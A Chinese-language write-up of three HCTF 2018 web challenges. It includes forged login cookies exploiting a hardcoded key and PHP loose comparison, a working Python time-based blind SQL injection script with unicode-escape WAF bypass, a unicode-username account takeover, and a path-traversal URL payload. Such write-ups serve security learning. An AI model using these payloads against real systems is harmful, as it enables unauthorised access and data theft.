HCTF部分Web WriteUp

摘要： 寫在前面 前幾天HCTF剛好軟考，晚上回家看了下Web然後做了幾題，這裡簡單的記錄一下。 kzone 這個說來有意思，前端時間剛好搞了一個釣魚站，就是拿這個原始碼改的，但是當時審了很久沒發現什麼很好利用的點。 首先，我們掃描Web目錄，發現存在www.zip 直接下載到本地進...

寫在前面

前幾天HCTF剛好軟考，晚上回家看了下Web然後做了幾題，這裡簡單的記錄一下。

kzone

這個說來有意思，前端時間剛好搞了一個釣魚站，就是拿這個原始碼改的，但是當時審了很久沒發現什麼很好利用的點。

首先，我們掃描Web目錄，發現存在www.zip 直接下載到本地進行審計。 在 include/member.php 中我們發現了他的登入驗證邏輯。嘗試構造一個Cookie登入。這裡有兩種方法。

if (isset($_COOKIE["islogin"])) {
if ($_COOKIE["login_data"]) {
$login_data = json_decode($_COOKIE['login_data'], true);
$admin_user = $login_data['admin_user'];
$udata = $DB->get_row("SELECT * FROM fish_admin WHERE username='$admin_user' limit 1");
if ($udata['username'] == '') {
setcookie("islogin", "", time() - 604800);
setcookie("login_data", "", time() - 604800);
}
$admin_pass = sha1($udata['password'] . LOGIN_KEY);
echo $admin_pass,'<br>',$login_data['admin_pass'];
if ($admin_pass == $login_data['admin_pass']) {
$islogin = 1;
} else {
setcookie("islogin", "", time() - 604800);
setcookie("login_data", "", time() - 604800);
}
}
}

方法二，我們構造一個不存在的 admin_user 這時帶入資料庫查詢將查詢不出任何值，這時 admin_pass 就變成了 $admin_pass = sha1(LOGIN_KEY); 我們只需要得到 LOGIN_KEY 即可。 幸運的是我們發現 LOGIN_KEY 是寫死的，並且題目沒有更改這個KEY，我們直接通過他來構造Cookie來進行登入。 Cookie: PHPSESSID=3mj2de89c0hsihqkvsq2vttis5;islogin=1;login_data={"admin_user":"","admin_pass":"3aa526bed244d14a09ddcc49ba36684866ec7661"}

方法二，這裡的判斷是使用 == 來進行判斷的，其可能存在弱型別問題，可以用數字與字串弱等進行繞過。我們對密碼數字進行爆破，發現當密碼為65時可以成功登入。 Cookie: PHPSESSID=3mj2de89c0hsihqkvsq2vttis5;islogin=1;login_data={"admin_user":"admin","admin_pass":65}

但是！！！你會發現登入後臺並沒有什麼亂用。咱們繼續更進會發現， admin_user 這裡是存在注入的 但是，你會發現他有waf，而且很多函式都被過濾了。我們發現 login_data 是經過 json_decode 進行處理的，通過查閱資料我們得知可以使用16encode進行繞過 https://xz.aliyun.com/t/306 於是構造出最終payload

#coding:utf8
import requests
import time
str = 'abcdefghijklmnopqrstuvwxyz0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}~_,'
url = 'http://kzone.2018.hctf.io/admin/index.php'
payload = "islogin=1;login_data={0}\"admin_user\":\"fh'||(case\u0020when\u0020(\u006ceft(("+"SELECT\u0020F1A9\u0020from\u0020F1444g),{1})\u003dbinary'{2}')\u0020then\u0020\u0073leep(2)else\u00200\u0020end)\u0023"+"\",\"admin_pass\":\"0\"{3}"
#print payload
flag = ''
for i in range(1,40):
for a in str:
f1 =flag+a
data = payload.format('{',i,f1,'}')
#print data
starTime = time.time()
headers = {"Cookie":data}
res = requests.get(url,headers=headers)
#print res.text
if time.time()-starTime >2:
flag +=a
print flag
break
print 'flag'+flag

(指令碼寫的比較爛)

admin

在change頁面得到提示 分析原始碼，我們發現每次在註冊和登入的時候都會將使用者名稱轉化為小寫 參考http://blog.lnyas.xyz/?p=1411 我們可知其會將 ᴬᴬᴬ 轉化為 AAA ，那麼我們只需註冊一個使用者名稱為 ᴬdmin 的賬號，登入後修改密碼就能達到越權修改 admin 密碼的目的

warmup

根據提示獲得原始碼，直接參考https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/ 構造payload: http://warmup.2018.hctf.io/index.php?file=hint.php%253f/../../../../../../../../../../../ffffllllaaaagggg